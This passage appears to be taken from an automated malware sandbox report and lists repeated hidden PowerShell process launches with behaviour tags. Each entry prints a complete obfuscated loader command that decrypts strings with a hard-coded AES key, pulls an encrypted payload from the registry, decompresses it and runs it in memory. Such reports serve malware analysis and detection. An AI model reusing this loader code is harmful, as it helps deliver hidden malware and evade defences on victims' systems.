'').('gnirtSteG'[-1..-9] -join '')($ROThC);$tcAmN = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nAk2WftATJZWLNaz5AsOcg==');$tcAmN = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tcAmN, 0, $tcAmN.Length);$tcAmN = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tcAmN);$htfqf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('00vYPdm3YczDKThMGomP2t4PEP6NyfJ1C5JKdCAh6A/oUSNQeme7j6zRfYjMAujQjLMAjCD1XuFdbpYN4xDIp2LLVjDsenZDFy0y5/WsrDmlf+R2zXEEOVTkkpiynuc9nPRrX+NCyjUkdumv8qpjj3tpd8HQGoFyy3a1n9Qj6no8lIXggnt79qb7guowY2KMsZSxnWbj4puiAQ3jfajaMD/VPUBHdxyubLgHZvEHRDcthlAqFjq6T77sy2JPZiSzx9WmJFIR91f2l2OkQKkLVTuNEcaGNxHDa7BvsZX66E4L+OBfosly2Sfxw9Kdm29xZa+ilA72osygq47c33cRqYdsDL1ibti8yyxK2pTb7UOBDUZxYeZ51SUQtlQoCP/ZXugNu2/+kz+coNBmOi2AUAl+CjzWdQxH2aPTg+gDHro=');$htfqf = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($htfqf, 0, $htfqf.Length);$htfqf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($htfqf);$QZvFz = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7kfx/IIgvojG1Y8ORjXrlQ==');$QZvFz = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($QZvFz, 0, $QZvFz.Length);$QZvFz = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($QZvFz);$OWoCp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/HYssHkUfY8L1KxHOXtKvw==');$OWoCp = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OWoCp, 0, $OWoCp.Length);$OWoCp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OWoCp);$IQocv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2fDj9cGG5yOIQCzHyd0wjA==');$IQocv = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IQocv, 0, $IQocv.Length);$IQocv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IQocv);$MFEog = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vFfCR3EWJbL61LHSR35ULw==');$MFEog = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MFEog, 0, $MFEog.Length);$MFEog = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MFEog);$ezJBd = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QEqy5NLkcfbNR1XhqxPmNg==');$ezJBd = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ezJBd, 0, $ezJBd.Length);$ezJBd = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ezJBd);$BoSsL0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cV3Ch+wNgiNrh3nPXcEdyw==');$BoSsL0 = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BoSsL0, 0, $BoSsL0.Length);$BoSsL0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BoSsL0);$BoSsL1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tAuwPxztI7NTFSZO0GRx+Q==');$BoSsL1 = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BoSsL1, 0, $BoSsL1.Length);$BoSsL1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BoSsL1);$BoSsL2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gzza9eWYTaEjCWFmGo3rLw==');$BoSsL2 = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BoSsL2, 0, $BoSsL2.Length);$BoSsL2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BoSsL2);$BoSsL3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tNOahjTM/Tm2BvHo8xW75A==');$BoSsL3 = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BoSsL3, 0, $BoSsL3.Length);$BoSsL3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BoSsL3);$BOQkb.Dispose();$UAqSU1.Dispose();$Rdlce = [Microsoft.Win32.Registry]::$MFEog.$IQocv($BoSsL).$OWoCp($ROThC);$zwdFm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($Rdlce);$UAqSU = New-Object System.Security.Cryptography.AesManaged;$UAqSU.Mode = [System.Security.Cryptography.CipherMode]::CBC;$UAqSU.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$UAqSU.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3Cejgnbs4Mq4RjjGVF0oKf3M0OGYhcUdZQT8VjA1BTQ=');$UAqSU.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FuFkpEyBBb5eTiUHDuoejw==');$rpUCK = $UAqSU.('rotpyrceDetaerC'[-1..-15] -join '')();$zwdFm = $rpUCK.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($zwdFm, 0, $zwdFm.Length);$rpUCK.Dispose();$UAqSU.Dispose();$mWZFi = New-Object System.IO.MemoryStream(, $zwdFm);$rdOGT = New-Object System.IO.MemoryStream;$TtLsl = New-Object System.IO.Compression.GZipStream($mWZFi, [IO.Compression.CompressionMode]::$BoSsL1);$TtLsl.$ezJBd($rdOGT);$TtLsl.Dispose();$mWZFi.Dispose();$rdOGT.Dispose();$zwdFm = $rdOGT.ToArray();$sACye = $htfqf | IEX;$EjRHz = $sACye::$BoSsL2($zwdFm);$adjov = $EjRHz.EntryPoint;$adjov.$BoSsL0($null, (, [string[]] ($tcAmN)))
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4984

C:\Windows\$sxr-powershell.exe
"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1252).WaitForExit();[System.Threading.Thread]::Sleep(5000); $UAqSU1 = New-Object System.Security.Cryptography.AesManaged;$UAqSU1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$UAqSU1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$UAqSU1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3Cejgnbs4Mq4RjjGVF0oKf3M0OGYhcUdZQT8VjA1BTQ=');$UAqSU1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FuFkpEyBBb5eTiUHDuoejw==');$BOQkb = $UAqSU1.('rotpyrceDetaerC'[-1..-15] -join '')();$BoSsL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Hi9IUAdIvyu21FrLc35Wlg==');$BoSsL = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BoSsL, 0, $BoSsL.Length);$BoSsL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BoSsL);$ROThC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NuWQavY79dzw+av3Hm0iPSLwU4FiMsrTH6wKYXHnmQI=');$ROThC = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ROThC, 0, $ROThC.Length);$ROThC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ROThC);$tcAmN = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nAk2WftATJZWLNaz5AsOcg==');$tcAmN = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tcAmN, 0, $tcAmN.Length);$tcAmN = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tcAmN);$htfqf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('00vYPdm3YczDKThMGomP2t4PEP6NyfJ1C5JKdCAh6A/oUSNQeme7j6zRfYjMAujQjLMAjCD1XuFdbpYN4xDIp2LLVjDsenZDFy0y5/WsrDmlf+R2zXEEOVTkkpiynuc9nPRrX+NCyjUkdumv8qpjj3tpd8HQGoFyy3a1n9Qj6no8lIXggnt79qb7guowY2KMsZSxnWbj4puiAQ3jfajaMD/VPUBHdxyubLgHZvEHRDcthlAqFjq6T77sy2JPZiSzx9WmJFIR91f2l2OkQKkLVTuNEcaGNxHDa7BvsZX66E4L+OBfosly2Sfxw9Kdm29xZa+ilA72osygq47c33cRqYdsDL1ibti8yyxK2pTb7UOBDUZxYeZ51SUQtlQoCP/ZXugNu2/+kz+coNBmOi2AUAl+CjzWdQxH2aPTg+gDHro=');$htfqf = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($htfqf, 0, $htfqf.Length);$htfqf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($htfqf);$QZvFz = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7kfx/IIgvojG1Y8ORjXrlQ==');$QZvFz = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($QZvFz, 0, $QZvFz.Length);$QZvFz = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($QZvFz);$OWoCp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/HYssHkUfY8L1KxHOXtKvw==');$OWoCp = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OWoCp, 0, $OWoCp.Length);$OWoCp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OWoCp);$IQocv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2fDj9cGG5yOIQCzHyd0wjA==');$IQocv = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IQocv, 0, $IQocv.Length);$IQocv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IQocv);$MFEog = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vFfCR3EWJbL61LHSR35ULw==');$MFEog = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MFEog, 0, $MFEog.Length);$MFEog = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MFEog);$ezJBd = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QEqy5NLkcfbNR1XhqxPmNg==');$ezJBd = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ezJBd, 0, $ezJBd.Length);$ezJBd = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ezJBd);$BoSsL0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cV3Ch+wNgiNrh3nPXcEdyw==');$BoSsL0 = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BoSsL0, 0, $BoSsL0.Length);$BoSsL0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BoSsL0);$BoSsL1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tAuwPxztI7NTFSZO0GRx+Q==');$BoSsL1 = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BoSsL1, 0, $BoSsL1.Length);$BoSsL1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BoSsL1);$BoSsL2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gzza9eWYTaEjCWFmGo3rLw==');$BoSsL2 = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BoSsL2, 0, $BoSsL2.Length);$BoSsL2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BoSsL2);$BoSsL3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tNOahjTM/Tm2BvHo8xW75A==');$BoSsL3 = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BoSsL3, 0, $BoSsL3.Length);$BoSsL3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BoSsL3);$BOQkb.Dispose();$UAqSU1.Dispose();$Rdlce = [Microsoft.Win32.Registry]::$MFEog.$IQocv($BoSsL).$OWoCp($ROThC);$zwdFm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($Rdlce);$UAqSU = New-Object System.Security.Cryptography.AesManaged;$UAqSU.Mode = [System.Security.Cryptography.CipherMode]::CBC;$UAqSU.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$UAqSU.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3Cejgnbs4Mq4RjjGVF0oKf3M0OGYhcUdZQT8VjA1BTQ=');$UAqSU.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FuFkpEyBBb5eTiUHDuoejw==');$rpUCK = $UAqSU.('rotpyrceDetaerC'[-1..-15] -join '')();$zwdFm = $rpUCK.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($zwdFm, 0, $zwdFm.Length);$rpUCK.Dispose();$UAqSU.Dispose();$mWZFi = New-Object System.IO.MemoryStream(, $zwdFm);$rdOGT = New-Object System.IO.MemoryStream;$TtLsl = New-Object System.IO.Compression.GZipStream($mWZFi, [IO.Compression.CompressionMode]::$BoSsL1);$TtLsl.$ezJBd($rdOGT);$TtLsl.Dispose();$mWZFi.Dispose();$rdOGT.Dispose();$zwdFm = $rdOGT.ToArray();$sACye = $htfqf | IEX;$EjRHz = $sACye::$BoSsL2($zwdFm);$adjov = $EjRHz.EntryPoint;$adjov.$BoSsL0($null, (, [string[]] ($tcAmN)))
4⤵
PID:3896

C:\Windows\$sxr-powershell.exe
"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1252).WaitForExit();[System.Threading.Thread]::Sleep(5000); $UAqSU1 = New-Object System.Security.Cryptography.AesManaged;$UAqSU1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$UAqSU1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$UAqSU1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3Cejgnbs4Mq4RjjGVF0oKf3M0OGYhcUdZQT8VjA1BTQ=');$UAqSU1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FuFkpEyBBb5eTiUHDuoejw==');$BOQkb = $UAqSU1.('rotpyrceDetaerC'[-1..-15] -join '')();$BoSsL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Hi9IUAdIvyu21FrLc35Wlg==');$BoSsL = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BoSsL, 0, $BoSsL.Length);$BoSsL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BoSsL);$ROThC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NuWQavY79dzw+av3Hm0iPSLwU4FiMsrTH6wKYXHnmQI=');$ROThC = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ROThC, 0, $ROThC.Length);$ROThC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ROThC);$tcAmN = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nAk2WftATJZWLNaz5AsOcg==');$tcAmN = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tcAmN, 0, $tcAmN.Length);$tcAmN = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tcAmN);$htfqf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('00vYPdm3YczDKThMGomP2t4PEP6NyfJ1C5JKdCAh6A/oUSNQeme7j6zRfYjMAujQjLMAjCD1XuFdbpYN4xDIp2LLVjDsenZDFy0y5/WsrDmlf+R2zXEEOVTkkpiynuc9nPRrX+NCyjUkdumv8qpjj3tpd8HQGoFyy3a1n9Qj6no8lIXggnt79qb7guowY2KMsZSxnWbj4puiAQ3jfajaMD/VPUBHdxyubLgHZvEHRDcthlAqFjq6T77sy2JPZiSzx9WmJFIR91f2l2OkQKkLVTuNEcaGNxHDa7BvsZX66E4L+OBfosly2Sfxw9Kdm29xZa+ilA72osygq47c33cRqYdsDL1ibti8yyxK2pTb7UOBDUZxYeZ51SUQtlQoCP/ZXugNu2/+kz+coNBmOi2AUAl+CjzWdQxH2aPTg+gDHro=');$htfqf = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($htfqf, 0, $htfqf.Length);$htfqf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($htfqf);$QZvFz = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7kfx/IIgvojG1Y8ORjXrlQ==');$QZvFz = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($QZvFz, 0, $QZvFz.Length);$QZvFz = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($QZvFz);$OWoCp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/HYssHkUfY8L1KxHOXtKvw==');$OWoCp = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OWoCp, 0, $OWoCp.Length);$OWoCp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OWoCp);$IQocv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2fDj9cGG5yOIQCzHyd0wjA==');$IQocv = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IQocv, 0, $IQocv.Length);$IQocv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IQocv);$MFEog = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vFfCR3EWJbL61LHSR35ULw==');$MFEog = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MFEog, 0, $MFEog.Length);$MFEog = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MFEog);$ezJBd = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QEqy5NLkcfbNR1XhqxPmNg==');$ezJBd = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ezJBd, 0, $ezJBd.Length);$ezJBd = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ezJBd);$BoSsL0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cV3Ch+wNgiNrh3nPXcEdyw==');$BoSsL0 = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BoSsL0, 0, $BoSsL0.Length);$BoSsL0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BoSsL0);$BoSsL1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tAuwPxztI7NTFSZO0GRx+Q==');$BoSsL1 = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BoSsL1, 0, $BoSsL1.Length);$BoSsL1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BoSsL1);$BoSsL2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gzza9eWYTaEjCWFmGo3rLw==');$BoSsL2 = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BoSsL2, 0, $BoSsL2.Length);$BoSsL2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BoSsL2);$BoSsL3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tNOahjTM/Tm2BvHo8xW75A==');$BoSsL3 = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BoSsL3, 0, $BoSsL3.Length);$BoSsL3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BoSsL3);$BOQkb.Dispose();$UAqSU1.Dispose();$Rdlce = [Microsoft.Win32.Registry]::$MFEog.$IQocv($BoSsL).$OWoCp($ROThC);$zwdFm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($Rdlce);$UAqSU = New-Object System.Security.Cryptography.AesManaged;$UAqSU.Mode = [System.Security.Cryptography.CipherMode]::CBC;$UAqSU.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$UAqSU.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3Cejgnbs4Mq4RjjGVF0oKf3M0OGYhcUdZQT8VjA1BTQ=');$UAqSU.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FuFkpEyBBb5eTiUHDuoejw==');$rpUCK = $UAqSU.('rotpyrceDetaerC'[-1..-15] -join '')();$zwdFm = $rpUCK.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($zwdFm, 0, $zwdFm.Length);$rpUCK.Dispose();$UAqSU.Dispose();$mWZFi = New-Object System.IO.MemoryStream(, $zwdFm);$rdOGT = New-Object System.IO.MemoryStream;$TtLsl = New-Object System.IO.Compression.GZipStream($mWZFi, [IO.Compression.CompressionMode]::$BoSsL1);$TtLsl.$ezJBd($rdOGT);$TtLsl.Dispose();$mWZFi.Dispose();$rdOGT.Dispose();$zwdFm = $rdOGT.ToArray();$sACye = $htfqf | IEX;$EjRHz = $sACye::$BoSsL2($zwdFm);$adjov = $EjRHz.EntryPoint;$adjov.$BoSsL0($null, (, [string[]] ($tcAmN)))
4⤵
PID:2728

C:\Windows\$sxr-powershell.exe
"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1252).WaitForExit();[System.Threading.Thread]::Sleep(5000); $UAqSU1 = New-Object System.Security.Cryptography.AesManaged;$UAqSU1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$UAqSU1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$UAqSU1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3Cejgnbs4Mq4RjjGVF0oKf3M0OGYhcUdZQT8VjA1BTQ=');$UAqSU1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FuFkpEyBBb5eTiUHDuoejw==');$BOQkb = $UAqSU1.('rotpyrceDetaerC'[-1..-15] -join '')();$BoSsL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Hi9IUAdIvyu21FrLc35Wlg==');$BoSsL = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BoSsL, 0, $BoSsL.Length);$BoSsL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BoSsL);$ROThC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NuWQavY79dzw+av3Hm0iPSLwU4FiMsrTH6wKYXHnmQI=');$ROThC = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ROThC, 0, $ROThC.Length);$ROThC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ROThC);$tcAmN = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nAk2WftATJZWLNaz5AsOcg==');$tcAmN = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tcAmN, 0, $tcAmN.Length);$tcAmN = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tcAmN);$htfqf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('00vYPdm3YczDKThMGomP2t4PEP6NyfJ1C5JKdCAh6A/oUSNQeme7j6zRfYjMAujQjLMAjCD1XuFdbpYN4xDIp2LLVjDsenZDFy0y5/WsrDmlf+R2zXEEOVTkkpiynuc9nPRrX+NCyjUkdumv8qpjj3tpd8HQGoFyy3a1n9Qj6no8lIXggnt79qb7guowY2KMsZSxnWbj4puiAQ3jfajaMD/VPUBHdxyubLgHZvEHRDcthlAqFjq6T77sy2JPZiSzx9WmJFIR91f2l2OkQKkLVTuNEcaGNxHDa7BvsZX66E4L+OBfosly2Sfxw9Kdm29xZa+ilA72osygq47c33cRqYdsDL1ibti8yyxK2pTb7UOBDUZxYeZ51SUQtlQoCP/ZXugNu2/+kz+coNBmOi2AUAl+CjzWdQxH2aPTg+gDHro=');$htfqf = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($htfqf, 0, $htfqf.Length);$htfqf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($htfqf);$QZvFz = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7kfx/IIgvojG1Y8ORjXrlQ==');$QZvFz = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($QZvFz, 0, $QZvFz.Length);$QZvFz = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($QZvFz);$OWoCp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/HYssHkUfY8L1KxHOXtKvw==');$OWoCp = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OWoCp, 0, $OWoCp.Length);$OWoCp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OWoCp);$IQocv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2fDj9cGG5yOIQCzHyd0wjA==');$IQocv = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IQocv, 0, $IQocv.Length);$IQocv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IQocv);$MFEog = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vFfCR3EWJbL61LHSR35ULw==');$MFEog = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MFEog, 0, $MFEog.Length);$MFEog = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MFEog);$ezJBd = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QEqy5NLkcfbNR1XhqxPmNg==');$ezJBd = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ezJBd, 0, $ezJBd.Length);$ezJBd = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ezJBd);$BoSsL0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cV3Ch+wNgiNrh3nPXcEdyw==');$BoSsL0 = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BoSsL0, 0, $BoSsL0.Length);$BoSsL0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BoSsL0);$BoSsL1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tAuwPxztI7NTFSZO0GRx+Q==');$BoSsL1 = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BoSsL1, 0, $BoSsL1.Length);$BoSsL1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BoSsL1);$BoSsL2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gzza9eWYTaEjCWFmGo3rLw==');$BoSsL2 = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BoSsL2, 0, $BoSsL2.Length);$BoSsL2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BoSsL2);$BoSsL3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tNOahjTM/Tm2BvHo8xW75A==');$BoSsL3 = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BoSsL3, 0, $BoSsL3.Length);$BoSsL3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BoSsL3);$BOQkb.Dispose();$UAqSU1.Dispose();$Rdlce = [Microsoft.Win32.Registry]::$MFEog.$IQocv($BoSsL).$OWoCp($ROThC);$zwdFm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join 